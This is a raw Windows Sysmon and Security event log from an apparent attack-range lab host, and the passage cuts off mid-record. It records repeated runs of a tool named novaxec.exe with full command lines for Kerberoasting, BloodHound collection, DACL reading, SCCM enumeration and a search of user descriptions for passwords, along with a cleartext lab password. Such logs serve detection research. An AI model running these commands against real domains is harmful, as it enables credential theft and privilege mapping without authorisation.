534500x8000000000000000429706Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-19 00:46:24.385{f537045b-fcf9-6762-5c04-000000008101}440C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000429010Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 20:54:57.019{f537045b-366d-6763-af06-000000008101}15176C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000429009Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 20:54:56.133{f537045b-3670-6763-b006-000000008101}13300C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000931908SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x33f4C:\Users\ATTACKER\Documents\novaxec.exe%%19360x3b48"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --kerberoasting kerberoasting.txt -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000429006Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 20:54:08.628{f537045b-3670-6763-b006-000000008101}13300C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --kerberoasting kerberoasting.txt -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-366d-6763-af06-000000008101}15176C:\Users\ATTACKER\Documents\novaxec.exe"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --kerberoasting kerberoasting.txt -u ATTACKER -p TestAccountPassword123!@#ATTACKRANGE\ATTACKER 4688201331200x8020000000000000931907SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x3b48C:\Users\ATTACKER\Documents\novaxec.exe%%19360x26f8"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --kerberoasting kerberoasting.txt -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeS-1-16-8192 154100x8000000000000000429005Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 20:54:05.890{f537045b-366d-6763-af06-000000008101}15176C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --kerberoasting kerberoasting.txt -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-2a59-6763-3706-000000008101}9976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -v 3ATTACKRANGE\ATTACKER 534500x8000000000000000428755Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 19:51:26.319{f537045b-27b8-6763-2e06-000000008101}7632C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000428754Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 19:51:25.080{f537045b-27bb-6763-2f06-000000008101}4000C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000931450SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980xfa0C:\Users\ATTACKER\Documents\novaxec.exe%%19360x1dd0novaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoasting kerberoast.txtS-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000428751Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 19:51:23.305{f537045b-27bb-6763-2f06-000000008101}4000C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoasting kerberoast.txtC:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-27b8-6763-2e06-000000008101}7632C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoasting kerberoast.txtATTACKRANGE\ATTACKER 4688201331200x8020000000000000931449SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x1dd0C:\Users\ATTACKER\Documents\novaxec.exe%%19360xc64novaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoasting kerberoast.txtS-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 154100x8000000000000000428750Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 19:51:20.615{f537045b-27b8-6763-2e06-000000008101}7632C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoasting kerberoast.txtC:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-18de-6763-a905-000000008101}3172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 534500x8000000000000000428749Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 19:51:12.078{f537045b-27aa-6763-2b06-000000008101}9232C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000428748Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 19:51:11.179{f537045b-27ad-6763-2c06-000000008101}13884C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000931446SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x363cC:\Users\ATTACKER\Documents\novaxec.exe%%19360x2410novaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoastS-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000428745Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 19:51:09.308{f537045b-27ad-6763-2c06-000000008101}13884C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoastC:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-27aa-6763-2b06-000000008101}9232C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoastATTACKRANGE\ATTACKER 4688201331200x8020000000000000931445SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x2410C:\Users\ATTACKER\Documents\novaxec.exe%%19360xc64novaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoastS-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 154100x8000000000000000428744Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 19:51:06.602{f537045b-27aa-6763-2b06-000000008101}9232C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap 10.221.53.6 -u ATTACKER -p TestAccountPassword123!@# -U ADMINISTRATOR --kerberoastC:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-18de-6763-a905-000000008101}3172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 534500x8000000000000000428508Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 18:52:19.714{f537045b-19d8-6763-b305-000000008101}8500C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000428507Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 18:52:17.853{f537045b-19dc-6763-b405-000000008101}14256C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 154100x8000000000000000428504Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 18:52:12.018{f537045b-19dc-6763-b405-000000008101}14256C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap 10.221.53.6 --kerberoast=asdfoiahsdiofuC:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-19d8-6763-b305-000000008101}8500C:\Users\ATTACKER\Documents\novaxec.exenovaxec.exe ldap 10.221.53.6 --kerberoast=asdfoiahsdiofuATTACKRANGE\ATTACKER 4688201331200x8020000000000000930941SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x37b0C:\Users\ATTACKER\Documents\novaxec.exe%%19360x2134novaxec.exe ldap 10.221.53.6 --kerberoast=asdfoiahsdiofuS-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000428503Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 18:52:08.230{f537045b-19d8-6763-b305-000000008101}8500C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap 10.221.53.6 --kerberoast=asdfoiahsdiofuC:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-18de-6763-a905-000000008101}3172C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\ATTACKER 4688201331200x8020000000000000930940SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x2134C:\Users\ATTACKER\Documents\novaxec.exe%%19360xc64novaxec.exe ldap 10.221.53.6 --kerberoast=asdfoiahsdiofuS-1-0-0--0x0C:\Windows\System32\cmd.exeS-1-16-8192 534500x8000000000000000428449Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 18:43:22.314{f537045b-1124-6763-4605-000000008101}14736C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000428448Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 18:43:21.349{f537045b-112a-6763-4705-000000008101}6176C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000930547SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x1820C:\Users\ATTACKER\Documents\novaxec.exe%%19360x3990"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -M sccm -o REC_RESOLVE=TRUE -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000428292Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 18:15:06.754{f537045b-112a-6763-4705-000000008101}6176C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -M sccm -o REC_RESOLVE=TRUE -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-1124-6763-4605-000000008101}14736C:\Users\ATTACKER\Documents\novaxec.exe"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -M sccm -o REC_RESOLVE=TRUE -u ATTACKER -p TestAccountPassword123!@#ATTACKRANGE\ATTACKER 4688201331200x8020000000000000930546SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x3990C:\Users\ATTACKER\Documents\novaxec.exe%%19360x36ec"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -M sccm -o REC_RESOLVE=TRUE -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeS-1-16-8192 154100x8000000000000000428291Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 18:15:00.919{f537045b-1124-6763-4605-000000008101}14736C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -M sccm -o REC_RESOLVE=TRUE -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-fd38-6762-6104-000000008101}14060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\ATTACKER 154100x8000000000000000427325Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:47:36.992{f537045b-fca8-6762-5e03-000000008101}1320C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" "--multiprocessing-fork" "parent_pid=14236" "pipe_handle=22796"C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-fc3a-6762-0903-000000008101}14236C:\Users\ATTACKER\Documents\novaxec.exe"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --bloodhound --collection All -u ATTACKER -p TestAccountPassword123!@#ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926973SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x379cC:\Users\ATTACKER\Documents\novaxec.exe%%19360x3160"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --bloodhound --collection All -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000427159Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:45:46.236{f537045b-fc3a-6762-0903-000000008101}14236C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --bloodhound --collection All -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-fc37-6762-0803-000000008101}12640C:\Users\ATTACKER\Documents\novaxec.exe"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --bloodhound --collection All -u ATTACKER -p TestAccountPassword123!@#ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926972SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x3160C:\Users\ATTACKER\Documents\novaxec.exe%%19360x20f4"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --bloodhound --collection All -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeS-1-16-8192 154100x8000000000000000427158Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:45:43.417{f537045b-fc37-6762-0803-000000008101}12640C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 --bloodhound --collection All -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{00000000-0000-0000-0000-000000000000}8436--- 534500x8000000000000000427143Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:39:19.434{f537045b-f9e7-6762-fc02-000000008101}6076C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000427142Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:39:18.528{f537045b-f9e9-6762-fd02-000000008101}12384C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000926948SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x3060C:\Users\ATTACKER\Documents\novaxec.exe%%19360x17bc"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -M daclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000427136Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:53.716{f537045b-f9e9-6762-fd02-000000008101}12384C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -M daclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f9e7-6762-fc02-000000008101}6076C:\Users\ATTACKER\Documents\novaxec.exe"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -M daclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926947SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x17bcC:\Users\ATTACKER\Documents\novaxec.exe%%19360x20f4"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -M daclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeS-1-16-8192 154100x8000000000000000427134Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:51.208{f537045b-f9e7-6762-fc02-000000008101}6076C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -M daclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{00000000-0000-0000-0000-000000000000}8436--- 534500x8000000000000000427133Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:46.007{f537045b-f9da-6762-f902-000000008101}14016C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000427132Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:44.879{f537045b-f9dd-6762-fa02-000000008101}6208C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000926945SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x1840C:\Users\ATTACKER\Documents\novaxec.exe%%19360x36c0"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000427129Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:41.303{f537045b-f9dd-6762-fa02-000000008101}6208C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f9da-6762-f902-000000008101}14016C:\Users\ATTACKER\Documents\novaxec.exe"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#ATTACKRANGE\ATTACKER 154100x8000000000000000427128Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:38.800{f537045b-f9da-6762-f902-000000008101}14016C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{00000000-0000-0000-0000-000000000000}8436--- 4688201331200x8020000000000000926944SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x36c0C:\Users\ATTACKER\Documents\novaxec.exe%%19360x20f4"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ACTION=read -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeS-1-16-8192 534500x8000000000000000427127Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:31.656{f537045b-f9cf-6762-f702-000000008101}13648C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000926943SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x3630C:\Users\ATTACKER\Documents\novaxec.exe%%19360x3550"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ATIONc=read -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 534500x8000000000000000427126Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:30.605{f537045b-f9d2-6762-f802-000000008101}13872C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 154100x8000000000000000427125Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:30.391{f537045b-f9d2-6762-f802-000000008101}13872C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ATIONc=read -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{f537045b-f9cf-6762-f702-000000008101}13648C:\Users\ATTACKER\Documents\novaxec.exe"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ATIONc=read -u ATTACKER -p TestAccountPassword123!@#ATTACKRANGE\ATTACKER 4688201331200x8020000000000000926942SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x3550C:\Users\ATTACKER\Documents\novaxec.exe%%19360x20f4"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ATIONc=read -u ATTACKER -p TestAccountPassword123!@#S-1-0-0--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeS-1-16-8192 154100x8000000000000000427124Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:35:27.676{f537045b-f9cf-6762-f702-000000008101}13648C:\Users\ATTACKER\Documents\novaxec.exe-----"C:\Users\ATTACKER\Documents\novaxec.exe" ldap 10.8.25.231 -k -Mdaclread -o TARGET=ATTACKER ATIONc=read -u ATTACKER -p TestAccountPassword123!@#C:\Users\ATTACKER\Documents\ATTACKRANGE\ATTACKER{f537045b-ce6a-6762-9845-0e0000000000}0xe45981MediumSHA256=6285D32A9491A0084DA85A384A11E15E203BADF67B1DEED54155F02B7338B108{00000000-0000-0000-0000-000000000000}8436--- 534500x8000000000000000426994Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:12:11.515{f537045b-f456-6762-af02-000000008101}12696C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 534500x8000000000000000426993Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:12:10.487{f537045b-f458-6762-b002-000000008101}7044C:\Users\ATTACKER\Documents\novaxec.exeATTACKRANGE\ATTACKER 4688201331200x8020000000000000926728SecurityWIN_ATTACK_PC.ATTACKRANGE.LOCALS-1-5-21-582199726-6069634552-312552118-948875ATTACKERATTACKRANGE0xe45980x1b84C:\Users\ATTACKER\Documents\novaxec.exe%%19360x3198novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 10.8.25.231 -M get-desc-users PASSWORDPOLICY FILTER="password"S-1-0-0--0x0C:\Users\ATTACKER\Documents\novaxec.exeS-1-16-8192 154100x8000000000000000426990Microsoft-Windows-Sysmon/OperationalWIN_ATTACK_PC.ATTACKRANGE.LOCAL-2024-12-18 16:12:08.877{f537045b-f458-6762-b002-000000008101}7044C:\Users\ATTACKER\Documents\novaxec.exe-----novaxec.exe ldap -u ATTACKER -p TestAccountPassword123!@# -d ATTACKRANGE.LOCAL 